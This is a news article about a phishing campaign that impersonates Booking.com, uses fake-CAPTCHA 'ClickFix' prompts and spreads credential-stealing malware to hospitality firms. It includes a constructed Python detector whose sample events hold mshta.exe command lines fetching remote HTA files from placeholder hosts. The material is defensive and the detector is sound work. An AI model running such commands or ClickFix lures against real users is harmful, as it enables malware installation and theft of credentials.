Phishing Campaign Impersonates Booking.com, Plants Malware


A recent phishing campaign has raised alarms among cybersecurity professionals after it impersonated Booking.com to deliver a suite of credential-stealing malware.

First detected in December 2024 and persisting into early 2025, the threat targets hospitality organizations across North America, Oceania, Asia, and Europe. Using an insidious social engineering method called ClickFix, attackers manipulate users into unwittingly executing malicious commands, leading to extensive data theft and financial fraud.

The anatomy of the attack

The campaign employs a multi-layered approach, starting with deceptive emails that appear to originate from Booking.com. Here’s what comes next:

  1. These emails lure victims with urgent requests, from resolving guest review issues to verifying account information. 
  2. The phishing messages include links or attachments that direct users to fake Booking.com pages. 
  3. Once on these pages, a fake CAPTCHA overlay employs the ClickFix technique — users are tricked into copying and executing a command in the Windows Run window. 
  4. This command, executed via mshta.exe, downloads and launches various malware families, such as XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT. 

Each malware variant is designed to capture sensitive credentials and financial information, making them potent tools for cybercriminals.
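The mshta.exe launch in step 4 leaves a trace in process-creation telemetry that defenders can hunt for. The sketch below is an added example, not code from the article or from Microsoft. The Sysmon-style field names, host names, the HelpTool path and the example.invalid URLs are constructed, and it assumes commands typed into the Run window appear as children of explorer.exe.

```python
import ntpath
import re

URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events (Sysmon Event ID 1 style field names).
SAMPLE_EVENTS = [
    {"host": "FRONTDESK-01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://example.invalid/verify"},
    {"host": "BACKOFFICE-02", "ParentImage": r"C:\Program Files\HelpTool\helptool.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\HelpTool\about.hta"'},
    {"host": "FRONTDESK-03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"host": "RESV-04", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\MSHTA.EXE",
     "CommandLine": "MSHTA.EXE HTTP://example.invalid/a.hta"},
]

def exe_name(path):
    """Lower-cased file name of a Windows path, ignoring surrounding quotes."""
    return ntpath.basename(path.strip('"')).lower()

def find_clickfix(events):
    """Return findings for mshta.exe runs that fetch from a remote URL."""
    findings = []
    for ev in events:
        if exe_name(ev["Image"]) != "mshta.exe":
            continue
        match = URL.search(ev["CommandLine"])
        if not match:
            continue  # local .hta file: out of scope for this rule
        # Assumption: Run-window commands are spawned by explorer.exe.
        from_shell = exe_name(ev["ParentImage"]) == "explorer.exe"
        findings.append({"host": ev["host"], "url": match.group(0),
                         "severity": "high" if from_shell else "medium"})
    return findings

if __name__ == "__main__":
    for f in find_clickfix(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['host']:14} {f['url']}")
```

The same two conditions (mshta.exe with a URL argument, parent explorer.exe) translate directly into an EDR or SIEM query; the medium tier catches the same fetch started from another parent process.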

ClickFix: A tactic to bypass traditional defenses

ClickFix capitalizes on human error by presenting victims with seemingly routine error messages. These prompts compel users to engage in actions that bypass standard automated security checks, allowing malware to slip through defenses. 

The ease with which these malicious payloads are delivered underscores the sophistication of the campaign. Microsoft’s threat intelligence team, which labels this campaign Storm-1865, emphasizes that the attackers have refined their techniques over time, evolving from previous phishing schemes targeting hotel guests and online shoppers.

Implications for organizations

This evolving threat highlights the importance of robust cybersecurity awareness and defensive measures for organizations. Here’s what enterprises, particularly those in the hospitality sector, can do:

  • Invest in comprehensive user education programs to help staff recognize phishing attempts. 
  • Implement phishing-resistant authentication methods and multi-factor authentication (MFA) across all access points. 
  • Deploy advanced threat detection tools, such as Microsoft Defender for Endpoint and Office 365, to identify and neutralize suspicious activities before significant damage occurs. 

As phishing tactics evolve, staying ahead of adversaries with updated threat intelligence and continuous employee training is crucial to minimizing risk and protecting sensitive data.

To further fortify your security measures, learn about spear phishing, which targets individuals or specific groups in an organization, and how you can avoid it.

Sunny Yadav